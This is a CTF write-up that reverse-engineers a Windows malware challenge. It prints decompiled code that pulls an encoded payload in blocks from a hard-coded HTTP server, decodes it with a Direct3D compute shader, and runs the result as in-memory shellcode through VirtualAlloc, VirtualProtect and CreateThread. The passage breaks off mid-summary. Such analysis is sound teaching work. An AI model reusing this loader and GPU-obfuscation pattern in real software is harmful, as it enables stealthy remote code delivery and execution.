[EN] Shutlock 2025 - Graphical_malware

Graphical Malware

Challenge discovery

$ file graphical.exe
graphical.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections

The binary is stripped, so it has no symbols of its own (only the binary’s own symbols are removed; imported library functions keep their names, which makes reversing easier).

Some strings in the binary could give us some hints:

D3D11CreateDevice
Microsoft (R) HLSL Shader Compiler 10.1

These strings suggest that the binary uses Direct3D 11 and that we will be dealing with a shader.

Reverse the malware

The main function can be found at offset 0x7B4.

Child creation

  if ( !strcmp(*(const char **)(a2 + 8), "shutlock") )
  {
    sub_140001E8B();
    return 0LL;
  }
  if ( !strcmp(*(const char **)(a2 + 8), "ctf") )
  {
    sub_140001F40();
    return 0LL;
  }

First it checks whether argv[1] is either shutlock or ctf; if so, it runs sub_140001E8B or sub_140001F40 respectively and returns. If argv[1] is neither shutlock nor ctf, it continues with the rest of the main function.

It creates a pipe (on Windows, pipes are one of the ways in which multiple processes can communicate with each other):

PipeAttributes.nLength = 24;
PipeAttributes.lpSecurityDescriptor = 0LL;
PipeAttributes.bInheritHandle = 1;


CreatePipe(&hReadPipe, &hWritePipe, &PipeAttributes, 0) 

Then it will create 2 processes:

    GetModuleFileNameA(0LL, Filename, 0x104u);
      _snprintf_s(Buffer, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "shutlock");
      _snprintf_s(CommandLine, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "ctf");
      StartupInfo.hStdOutput = hWritePipe;
      dwFlags = StartupInfo.dwFlags;
      BYTE1(dwFlags) = BYTE1(StartupInfo.dwFlags) | 1;
      StartupInfo.dwFlags = dwFlags;
      if ( CreateProcessA(0LL, Buffer, 0LL, 0LL, 1, 0, 0LL, 0LL, &StartupInfo, &ProcessInformation) )
      {
        CloseHandle(hWritePipe);
        WaitForSingleObject(ProcessInformation.hProcess, 0xFFFFFFFF);
        lpStartupInfo.hStdInput = hReadPipe;
        v6 = lpStartupInfo.dwFlags;
        BYTE1(v6) = BYTE1(lpStartupInfo.dwFlags) | 1;
        lpStartupInfo.dwFlags = v6;
        if ( CreateProcessA(0LL, CommandLine, 0LL, 0LL, 1, 0, 0LL, 0LL, &lpStartupInfo, &hHandle) )
        {
          CloseHandle(hReadPipe);
          WaitForSingleObject(hHandle.hProcess, 0xFFFFFFFF);
          CloseHandle(ProcessInformation.hProcess);
          CloseHandle(ProcessInformation.hThread);
          CloseHandle(hHandle.hProcess);
          CloseHandle(hHandle.hThread);
          sub_140001360("Finished\n");
          return 0LL;
        }

First it runs itself with argv[1] = shutlock and redirects the stdout of this child to the write end of the previously created pipe (StartupInfo.hStdOutput = hWritePipe;). It waits for that child to exit, and then runs itself with argv[1] = ctf with the read end of the pipe as the stdin of this second child (lpStartupInfo.hStdInput = hReadPipe;).

For the rest of this writeup we will call child1 the child run with argv[1] = shutlock and child2 the one run with argv[1] = ctf.

Child1

If we look back at the beginning of the function we saw that if argv[1] is shutlock it will run sub_140001E8B, we will rename this function child1_main:

/*
 * child1_main (sub_140001E8B): entry point of the child started with
 * argv[1] == "shutlock".
 *
 * Obtains a heap buffer from sub_140001CE5, switches the stream returned by
 * off_14000A0D0() to binary mode and writes sub_140001ACA() bytes of the
 * buffer to it.
 *
 * Returns 0 on success, 1 if sub_140001CE5 returned NULL.
 */
__int64 child1_main()
{
  FILE *v1; // rax
  int v2; // eax
  FILE *v3; // rax
  FILE *v4; // rax
  size_t ElementCount; // [rsp+20h] [rbp-10h]
  void *Buffer; // [rsp+28h] [rbp-8h]

  // sub_140001CE5 builds the buffer that is written below; NULL means failure.
  Buffer = (void *)sub_140001CE5();
  if ( !Buffer )
    return 1LL;
  // NOTE(review): off_14000A0D0() is an indirect call whose arguments are not
  // shown by the decompiler; it is presumably the CRT accessor returning
  // stdout here -- confirm in the disassembly.
  v1 = (FILE *)off_14000A0D0();
  v2 = _fileno(v1);
  // 0x8000 is _O_BINARY: no newline translation on the written bytes.
  _setmode(v2, 0x8000);
  // The size is requested a second time instead of being returned by
  // sub_140001CE5; the result is sign-extended from int to size_t.
  ElementCount = (int)sub_140001ACA();
  v3 = (FILE *)off_14000A0D0();
  fwrite(Buffer, 1uLL, ElementCount, v3);
  v4 = (FILE *)off_14000A0D0();
  fflush(v4);
  free(Buffer);
  return 0LL;
}

The child1 main function is very simple: it creates a buffer with sub_140001CE5() and writes it to stdout. Let’s look at sub_140001CE5, which we will rename get_buf:

/*
 * get_buf (sub_140001CE5): assembles a buffer out of 16-byte blocks.
 *
 * Asks sub_140001ACA for the total size, allocates that many bytes and fills
 * them block by block with the data produced by sub_1400018B1.
 *
 * Returns the malloc'ed buffer (the caller frees it), or NULL if the size is
 * not positive, the allocation fails, or any block cannot be retrieved.
 */
void *get_buf()
{
  int v1; // eax
  int v2; // eax
  _QWORD Src[3]; // [rsp+20h] [rbp-30h] BYREF
  void *Block; // [rsp+38h] [rbp-18h]
  int v5; // [rsp+40h] [rbp-10h]
  int v6; // [rsp+44h] [rbp-Ch]
  int v7; // [rsp+48h] [rbp-8h]
  int i; // [rsp+4Ch] [rbp-4h]

  // v6 = total size in bytes; zero or negative (including -1) aborts.
  v6 = sub_140001ACA();
  if ( v6 <= 0 )
    return 0LL;
  // v5 = (v6 + 15) / 16 as a signed division, i.e. the number of 16-byte
  // blocks rounded up. The "+ 30" branch is the compiler's adjustment for a
  // negative dividend.
  v1 = v6 + 15;
  if ( v6 + 15 < 0 )
    v1 = v6 + 30;
  v5 = v1 >> 4;
  Block = malloc(v6);
  if ( !Block )
    return 0LL;
  for ( i = 0; i < v5; ++i )
  {
    // Clear the 16 bytes that receive this block.
    Src[0] = 0LL;
    Src[1] = 0LL;
    // 0x927C0 ms = 600,000 ms = 10 minutes of delay before every block.
    Sleep(0x927C0u);
    // A non-zero return from sub_1400018B1 is treated as failure.
    if ( (unsigned int)sub_1400018B1((unsigned int)i, Src) )
    {
      free(Block);
      return 0LL;
    }
    // The last block only contributes v6 % 16 bytes, or a full 16 when the
    // size is an exact multiple of 16; every other block contributes 16.
    if ( i == v5 - 1 )
      v2 = v6 % 16;
    else
      v2 = 16;
    v7 = v2;
    if ( !v2 )
      v7 = 16;
    // Blocks are stored back to back at offset 16 * i.
    memcpy((char *)Block + 16 * i, Src, v7);
  }
  return Block;
}

It gets the payload size from sub_140001ACA, allocates a buffer of that size and iterates over ceil(size / 16) blocks (v1 = v6 + 15; v5 = v1 >> 4;). For each block it sleeps for 0x927C0 ms (600,000 ms, i.e. 10 minutes) and then calls sub_1400018B1. Let’s look at those two functions, starting with the one that retrieves the size, which we will rename get_size:

/*
 * sub_140001ACA (renamed get_size in this writeup): fetches a number over HTTP.
 *
 * Opens http://57.128.85.25:50002/size with WinINet, reads at most 0x63 (99)
 * bytes of the response, NUL-terminates them and converts them with atoi().
 *
 * Returns the parsed value, or 0xFFFFFFFF (-1 as a 32-bit int) if the session
 * cannot be opened, the URL cannot be opened, or the read fails.
 */
__int64 sub_140001ACA()
{
  WCHAR szUrl[70]; // [rsp+30h] [rbp-50h] BYREF
  DWORD dwNumberOfBytesRead; // [rsp+BCh] [rbp+3Ch] BYREF
  _QWORD Buffer[12]; // [rsp+C0h] [rbp+40h] BYREF
  int v4; // [rsp+120h] [rbp+A0h]
  unsigned int v5; // [rsp+12Ch] [rbp+ACh]
  HINTERNET hFile; // [rsp+130h] [rbp+B0h]
  HINTERNET hInternet; // [rsp+138h] [rbp+B8h]

  hFile = 0LL;
  // NOTE(review): Buffer (96 bytes at rsp+C0h) and v4 (4 bytes at rsp+120h)
  // are adjacent on the stack and are both zeroed; they are presumably one
  // 100-byte char buffer in the original source -- confirm.
  memset(Buffer, 0, sizeof(Buffer));
  v4 = 0;
  dwNumberOfBytesRead = 0;
  v5 = 0;
  // User agent "HTTPGET"; access type 1 is INTERNET_OPEN_TYPE_DIRECT.
  hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
  if ( !hInternet )
    return 0xFFFFFFFFLL;
  // NOTE(review): sub_140001828 is presumably a bounded wide-char printf
  // wrapper (destination, capacity, format, arguments) -- confirm.
  sub_140001828(szUrl, 64LL, L"http://%ls/size", L"57.128.85.25:50002");
  hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
  if ( hFile )
  {
    if ( InternetReadFile(hFile, Buffer, 0x63u, &dwNumberOfBytesRead) )
    {
      // Terminate the response text right after the bytes actually read.
      *((_BYTE *)Buffer + dwNumberOfBytesRead) = 0;
      v5 = atoi((const char *)Buffer);
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      return v5;
    }
    else
    {
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      return 0xFFFFFFFFLL;
    }
  }
  else
  {
    InternetCloseHandle(hInternet);
    return 0xFFFFFFFFLL;
  }
}

It does a GET request on http://57.128.85.25:50002/size, parses the response body as an integer with atoi((const char *)Buffer); and returns it (or -1 if the request fails).

Now what’s sub_1400018B1 that we will rename get_part:

/*
 * get_part (sub_1400018B1): downloads one block and decodes it in place.
 *
 * a1            zero-based block index; the URL requested is
 *               http://57.128.85.25:50002/<a1 + 1>.
 * encoded_buff  receives up to 0x10 bytes of the response and is then
 *               overwritten with the decoded bytes.
 *
 * Returns 0 on success, 1 if the WinINet session, the URL or the read fails,
 * and 0xFFFFFFFF if decode() returns NULL.
 */
__int64 __fastcall get_part(int a1, void *encoded_buff)
{
  __int64 v3; // [rsp+0h] [rbp-80h] BYREF
  __int64 dwFlags; // [rsp+20h] [rbp-60h]
  WCHAR szUrl[258]; // [rsp+30h] [rbp-50h] BYREF
  DWORD dwNumberOfBytesRead; // [rsp+234h] [rbp+1B4h] BYREF
  void *Src; // [rsp+238h] [rbp+1B8h]
  HINTERNET hFile; // [rsp+240h] [rbp+1C0h]
  HINTERNET hInternet; // [rsp+248h] [rbp+1C8h]

  hInternet = 0LL;
  hFile = 0LL;
  dwNumberOfBytesRead = 0;
  // The "dwFlags" stack slot is really the %d argument of the format call
  // below: the index sent to the server is a1 + 1.
  LODWORD(dwFlags) = a1 + 1;
  // &v3 + 6 is rsp + 0x30, i.e. szUrl: the URL is formatted into szUrl.
  sub_140001828((__int64)(&v3 + 6), 256LL, (__int64)L"http://%ls/%d", L"57.128.85.25:50002", dwFlags);
  hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
  if ( !hInternet )
    return 1LL;
  // 0x927C0 ms = 600,000 ms = 10 minutes of delay before the request.
  Sleep(0x927C0u);
  hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
  if ( hFile )
  {
    // A single read of at most 16 bytes; dwNumberOfBytesRead receives the
    // number of bytes actually read.
    if ( InternetReadFile(hFile, encoded_buff, 0x10u, &dwNumberOfBytesRead) )
    {
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      // decode() returns a heap buffer holding the decoded bytes, or NULL.
      Src = (void *)decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead);
      if ( Src )
      {
        // Replace the encoded bytes with the decoded ones and drop the copy.
        memcpy(encoded_buff, Src, dwNumberOfBytesRead);
        free(Src);
        return 0LL;
      }
      else
      {
        return 0xFFFFFFFFLL;
      }
    }
    else
    {
      InternetCloseHandle(hFile);
      InternetCloseHandle(hInternet);
      return 1LL;
    }
  }
  else
  {
    InternetCloseHandle(hInternet);
    return 1LL;
  }
}

It also does a GET request to the same server to retrieve the n-th part (the index in the URL is a1 + 1, so parts are numbered from 1) and then calls decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead), which in turn calls sub_140002353(encoded_buff, size, 0xDEADBEEF - 0x42 * a1); we will rename that last function gpu_decode:

/*
 * gpu_decode (sub_140002353): runs an embedded Direct3D 11 compute shader
 * over a buffer.
 *
 * encoded_buff  pointer to the input bytes uploaded to the GPU buffer.
 * size          number of input bytes; also the size of the returned buffer.
 * key           32-bit value written at the start of the 16-byte constant
 *               buffer bound to constant-buffer slot 0.
 *
 * Returns a malloc'ed buffer of `size` bytes when sub_140002182 reports
 * success (non-zero), otherwise NULL.
 *
 * NOTE(review): on the success path the function returns before the Release
 * calls at the bottom, and when sub_140002182 returns 0 the malloc'ed v23 is
 * never freed.
 */
void *__fastcall gpu_decode(__int64 encoded_buff, size_t size, unsigned int key)
{
  _QWORD *v4; // rcx
  __int64 v5; // rdx
  __int64 v6; // [rsp+58h] [rbp-28h] BYREF
  _QWORD *v7; // [rsp+60h] [rbp-20h] BYREF
  __int64 v8; // [rsp+70h] [rbp-10h]
  __int64 v9; // [rsp+78h] [rbp-8h]
  __int64 v10; // [rsp+80h] [rbp+0h] BYREF
  int v11; // [rsp+88h] [rbp+8h]
  unsigned int v12; // [rsp+8Ch] [rbp+Ch]
  int v13; // [rsp+90h] [rbp+10h]
  __int64 v14; // [rsp+A0h] [rbp+20h]
  __int64 v15; // [rsp+A8h] [rbp+28h]
  __int64 v16; // [rsp+B0h] [rbp+30h]
  __int128 v17; // [rsp+C0h] [rbp+40h]
  __int64 v18; // [rsp+D8h] [rbp+58h] BYREF
  __int64 v19; // [rsp+E0h] [rbp+60h] BYREF
  __int64 v20; // [rsp+E8h] [rbp+68h] BYREF
  ID3D11DeviceContext *ppImmediateContext; // [rsp+F0h] [rbp+70h] BYREF
  ID3D11Device *ppDevice; // [rsp+F8h] [rbp+78h] BYREF
  void *v23; // [rsp+100h] [rbp+80h]
  unsigned int v24; // [rsp+108h] [rbp+88h]
  unsigned int v25; // [rsp+10Ch] [rbp+8Ch]
  LPVOID v26; // [rsp+110h] [rbp+90h]
  HGLOBAL hResData; // [rsp+118h] [rbp+98h]
  DWORD v28; // [rsp+124h] [rbp+A4h]
  HRSRC hResInfo; // [rsp+128h] [rbp+A8h]
  unsigned int v30; // [rsp+130h] [rbp+B0h]
  unsigned int v31; // [rsp+134h] [rbp+B4h]
  HRESULT v32; // [rsp+138h] [rbp+B8h]
  int v33; // [rsp+13Ch] [rbp+BCh]
  __int64 v34; // [rsp+140h] [rbp+C0h]
  __int64 v35; // [rsp+148h] [rbp+C8h]

  ppDevice = 0LL;
  ppImmediateContext = 0LL;
  v35 = 0LL;
  v34 = 0LL;
  v20 = 0LL;
  v19 = 0LL;
  v18 = 0LL;
  v33 = size;
  // Hardware device, SDK version 7 (D3D11_SDK_VERSION), no explicit feature
  // levels; a negative HRESULT means failure.
  v32 = D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);
  if ( v32 < 0 )
  {
    sub_1400020D0("D3D11CreateDevice failed\n");
    return 0LL;
  }
  v17 = 0LL;
  v16 = 0LL;
  v14 = 0x200000010LL;
  v15 = 0x1000000000004LL;
  // v19: 16-byte constant buffer (see the failure message further down).
  // NOTE(review): sub_140002263 is presumably a CreateBuffer helper taking
  // (device, byte width, bind flags, usage, staging flag) -- confirm.
  v19 = sub_140002263((__int64)ppDevice, 16, 4u, 2, 0);
  if ( v19 )
  {
    v31 = size;
    // v30 = size rounded up to a multiple of 4 (whole 32-bit elements).
    v30 = (size + 3) & 0xFFFFFFFC;
    // v35 is the buffer that gets the UAV; v34 is handed to sub_140002182
    // together with v35 (presumably a staging buffer for the read-back).
    v35 = sub_140002263((__int64)ppDevice, v30, 0x88u, 0, 0);
    v34 = sub_140002263((__int64)ppDevice, v30, 0, 3, 1);
    if ( v35 && v34 )
    {
      // Upload the encoded bytes into v35.
      ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
        ppImmediateContext,
        v35,
        0LL,
        0LL,
        encoded_buff,
        0,
        0);
      // v10..v13 form the view description passed to CreateUnorderedAccessView
      // below; v12 = v30 >> 2 is the number of 32-bit elements.
      v13 = _mm_cvtsi128_si32((__m128i)0LL);
      v10 = 0x100000000LL;
      v11 = 0;
      v12 = v30 >> 2;
      // Constant-buffer contents: the key in the first 8 bytes (zero-extended),
      // zeros in the remaining 8.
      v8 = key;
      v9 = 0LL;
      // Map type 4 is D3D11_MAP_WRITE_DISCARD; v7 receives the mapped data.
      ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
        ppImmediateContext,
        v19,
        0LL,
        4LL,
        0,
        &v7);
      v4 = v7;
      v5 = v9;
      *v7 = v8;
      v4[1] = v5;
      ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
        ppImmediateContext,
        v19,
        0LL);
      // Bind the constant buffer to compute-shader slot 0.
      ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
        ppImmediateContext,
        0LL,
        1LL,
        &v19);
      // v20 = unordered access view over v35.
      v32 = ((__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
              ppDevice,
              v35,
              &v10,
              &v20);
      if ( v32 >= 0 )
      {
        // Resource ID 0x65 (101) of type 0xA (RT_RCDATA) in this module holds
        // the compiled shader bytecode.
        hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
        if ( hResInfo )
        {
          v28 = SizeofResource(0LL, hResInfo);
          hResData = LoadResource(0LL, hResInfo);
          if ( hResData )
          {
            v26 = LockResource(hResData);
            // v18 = compute shader created from the resource bytes.
            v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
                    ppDevice,
                    v26,
                    v28,
                    0LL,
                    &v18);
            if ( v32 >= 0 )
            {
              // Bind the UAV to slot 0 and select the shader.
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
                ppImmediateContext,
                0LL,
                1LL,
                &v20,
                0LL);
              ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
                ppImmediateContext,
                v18,
                0LL,
                0LL);
              // v25 = ceil(size / 4) 32-bit elements; v24 = ceil(v25 / 256)
              // thread groups along X.
              v25 = (unsigned int)(v33 + 3) >> 2;
              v24 = (v25 + 255) >> 8;
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
                ppImmediateContext,
                v24,
                1LL,
                1LL);
              // Unbind the UAV (v6 is a NULL view) and the shader.
              v6 = 0LL;
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
                ppImmediateContext,
                0LL,
                1LL,
                &v6,
                0LL);
              ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
                ppImmediateContext,
                0LL,
                0LL,
                0LL);
              // NOTE(review): sub_140002182 presumably copies v35 into v34 and
              // reads v31 bytes back into v23 -- confirm. The malloc result is
              // not checked here.
              v23 = malloc(size);
              if ( (unsigned int)sub_140002182((__int64)ppImmediateContext, v35, v34, (__int64)v23, v31) )
                return v23;
            }
            else
            {
              puts("CreateComputeShader failed");
            }
          }
          else
          {
            puts("LoadResource failed");
          }
        }
        else
        {
          puts("FindResource failed");
        }
      }
      else
      {
        sub_1400020D0("CreateUAV failed\n");
      }
    }
    else
    {
      sub_1400020D0("buffer creation failed\n");
    }
  }
  else
  {
    puts("Create constant buffer failed");
  }
  // Failure path: call the vtable entry at offset 16 (IUnknown::Release, the
  // third slot) on every object that was created.
  if ( v20 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v20 + 16LL))(v20);
  if ( v18 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v18 + 16LL))(v18);
  if ( v35 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v35 + 16LL))(v35);
  if ( v34 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v34 + 16LL))(v34);
  if ( ppImmediateContext )
    ((void (__fastcall *)(ID3D11DeviceContext *))ppImmediateContext->lpVtbl->Release)(ppImmediateContext);
  if ( ppDevice )
    ((void (__fastcall *)(ID3D11Device *))ppDevice->lpVtbl->Release)(ppDevice);
  if ( v19 )
    (*(void (__fastcall **)(__int64))(*(_QWORD *)v19 + 16LL))(v19);
  return 0LL;
}

This function uses the Direct3D 11 API (https://fr.wikipedia.org/wiki/Direct3D ), which according to Wikipedia is described as follows: “Direct3D is a graphics application programming interface (API) for Microsoft Windows. Part of DirectX, Direct3D is used to render three-dimensional graphics in applications where performance is important, such as games.”

So why are there 3D libraries in a binary that looks like malware?

Let’s get a better understanding of the function, the function do:

First it creates a Direct3D device, uploads the encoded buffer to a GPU buffer, writes the key into a constant buffer and creates an unordered access view (UAV) on the data buffer:

D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);

(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
        ppImmediateContext,
        v35,
        0LL,
        0LL,
        encoded_buff,
        0,
        0);

(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
        ppImmediateContext,
        v19,
        0LL,
        4LL,
        0,
        &v7);

(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
        ppImmediateContext,
        v19,
        0LL);

(void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
        ppImmediateContext,
        0LL,
        1LL,
        &v19);

(__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
  ppDevice,
  v35,
  &v10,
  &v20);

Then it loads the resource with ID 0x65 (101) and type 0xA (RT_RCDATA):

hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
v28 = SizeofResource(0LL, hResInfo);
hResData = LoadResource(0LL, hResInfo);
v26 = LockResource(hResData);

Then it uses the resource to create a compute shader, binds the UAV, dispatches the shader and unbinds everything:

v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
        ppDevice,
        v26,
        v28,
        0LL,
        &v18);
if ( v32 >= 0 )
{
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
    ppImmediateContext,
    0LL,
    1LL,
    &v20,
    0LL);
  ((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
    ppImmediateContext,
    v18,
    0LL,
    0LL);
  v25 = (unsigned int)(v33 + 3) >> 2;
  v24 = (v25 + 255) >> 8;
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
    ppImmediateContext,
    v24,
    1LL,
    1LL);
  v6 = 0LL;
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
    ppImmediateContext,
    0LL,
    1LL,
    &v6,
    0LL);
  ((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
    ppImmediateContext,
    0LL,
    0LL,
    0LL);

And finally it allocates an output buffer and calls sub_140002182, returning the buffer if that call succeeds:

  v23 = malloc(a2);
  if ( (unsigned int)sub_140002182((_DWORD)ppImmediateContext, v35, v34, (_DWORD)v23, v31) )
    return v23;

Retrieve the shader

We know that the shader is loaded from a resource with ID 101 (which is located in the .rsrc section). We can use many techniques to retrieve it, but I usually do it using PEstudio (https://www.winitor.com/download , the free version is enough): we load graphical.exe in it and then look at the resources panel.

/images/pestudio.png

We can see the resource we are looking for, with ID 101. We can dump it using Right Click -> instance -> save to file. We also see that the first bytes of the resource are DXBC, which, with a bit of Googling, indicates that it is shader bytecode for Direct3D.

We can disassemble it using fxc:

 C:/Program\ Files\ \(x86\)/Windows\ Kits/10/bin/10.0.22621.0/x64/fxc.exe /dumpbin /nologo ressource.dump 

//
// Generated by Microsoft (R) HLSL Shader Compiler 10.1
//
//
// Buffer Definitions: 
//
// cbuffer KeyCB
// {
//
//   uint xorKey;                       // Offset:    0 Size:     4
//
// }
//
// Resource bind info for gData
// {
//
//   uint $Element;                     // Offset:    0 Size:     4
//
// }
//
//
// Resource Bindings:
//
// Name                                 Type  Format         Dim      HLSL Bind  Count
// ------------------------------ ---------- ------- ----------- -------------- ------
// gData                                 UAV  struct         r/w             u0      1 
// KeyCB                             cbuffer      NA          NA            cb0      1 
//
//
//
// Input signature:
//
// Name                 Index   Mask Register SysValue  Format   Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Input
//
// Output signature:
//
// Name                 Index   Mask Register SysValue  Format   Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Output
cs_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer CB0[1], immediateIndexed
dcl_uav_structured u0, 4
dcl_input vThreadID.x
dcl_temps 1
dcl_thread_group 256, 1, 1
bufinfo_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, u0.xyzw
ult r0.x, vThreadID.x, r0.x
if_nz r0.x
  ld_structured_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, vThreadID.x, l(0), u0.xxxx
  xor r0.x, r0.x, cb0[0].x
  iadd r0.x, r0.x, l(0x11001122)
  store_structured u0.x, vThreadID.x, l(0), r0.x
endif 
ret 
// Approximately 9 instruction slots used

The shader is simple: each thread loads one 32-bit element of the buffer (gData, bound to u0), XORs it with the key (xorKey from KeyCB, bound to cb0), adds 0x11001122 to the result and stores it back in place.

OK, now we understand how each part is decoded: the key for part i is derived as 0xDEADBEEF - 0x42 * i (i being the zero-based index of the part), each 32-bit word of the encoded data is XORed with the derived key, and 0x11001122 is then added to it (modulo 2^32).

If we go back to get_buf, each decoded block is appended to the previous one (memcpy((char *)Block + 16 * i, Src, v7);), the whole buffer is returned to child1_main, and then it is simply written to stdout. Surely that cannot do any damage?

Child2

If we remember what we saw in main, everything written to the stdout of the 1st child goes into the pipe and is then read by child2 (because the stdin of the 2nd child is the read end of the pipe). So let’s take a look at the main function of the 2nd child:

/*
 * child2_main (sub_140001F40): entry point of the child started with
 * argv[1] == "ctf".
 *
 * Gets the expected size from get_size(), reads exactly that many bytes from
 * the stream returned by off_14000A0D0(), copies them into freshly allocated
 * memory, makes that memory executable and runs it in a new thread.
 *
 * Returns 0 after the thread has finished, 1 if the size is 0 or larger than
 * 0x1000, if malloc fails, or if fewer bytes than expected could be read.
 */
__int64 child2_main()
{
  FILE *v0; // rax
  int v1; // eax
  FILE *v3; // rax
  DWORD flOldProtect; // [rsp+34h] [rbp-2Ch] BYREF
  HANDLE hHandle; // [rsp+38h] [rbp-28h]
  BOOL v6; // [rsp+44h] [rbp-1Ch]
  void *lpAddress; // [rsp+48h] [rbp-18h]
  void *Buffer; // [rsp+50h] [rbp-10h]
  size_t Size; // [rsp+5Ch] [rbp-4h]

  flOldProtect = 0;
  // NOTE(review): off_14000A0D0() is an indirect call whose arguments are not
  // shown by the decompiler; it is presumably the CRT accessor returning
  // stdin here -- confirm in the disassembly.
  v0 = (FILE *)off_14000A0D0();
  v1 = _fileno(v0);
  // 0x8000 is _O_BINARY: the bytes are read without newline translation.
  _setmode(v1, 0x8000);
  LODWORD(Size) = get_size();
  // Only sizes from 1 to 0x1000 (4096) bytes are accepted; the -1 failure
  // value of get_size is rejected by the upper bound of the unsigned compare.
  if ( !(_DWORD)Size || (unsigned int)Size > 0x1000 )
    return 1LL;
  Buffer = malloc((unsigned int)Size);
  if ( !Buffer )
    return 1LL;
  v3 = (FILE *)off_14000A0D0();
  if ( fread(Buffer, 1uLL, (unsigned int)Size, v3) == (unsigned int)Size )
  {
    // 0x3000 = MEM_COMMIT | MEM_RESERVE, 4 = PAGE_READWRITE. The result is
    // not checked before it is used.
    lpAddress = VirtualAlloc(0LL, (unsigned int)Size, 0x3000u, 4u);
    memmove(lpAddress, Buffer, (unsigned int)Size);
    // 0x20 = PAGE_EXECUTE_READ: the copied bytes become executable.
    v6 = VirtualProtect(lpAddress, (unsigned int)Size, 0x20u, &flOldProtect);
    // The copied bytes are used directly as the thread start routine.
    hHandle = CreateThread(0LL, 0LL, (LPTHREAD_START_ROUTINE)lpAddress, 0LL, 0, 0LL);
    // 0xFFFFFFFF = INFINITE. Buffer is not freed on this path.
    WaitForSingleObject(hHandle, 0xFFFFFFFF);
    return 0LL;
  }
  else
  {
    puts("stdin read error");
    free(Buffer);
    return 1LL;
  }
}

The child2 main function is really straightforward: it retrieves the payload size (using the same HTTP request as the 1st child), reads that many bytes from stdin and then does a classic VirtualAlloc -> VirtualProtect -> CreateThread sequence to execute what has been read.

Get the final stage payload

So, in summary, the binary works like this:

  1. Create 2 children
  2. Child1 -> gets N parts of 16 bytes each from a remote server -> decodes them on the GPU -> writes the decoded payload to its stdout, which the pipe feeds to the stdin of the 2nd child
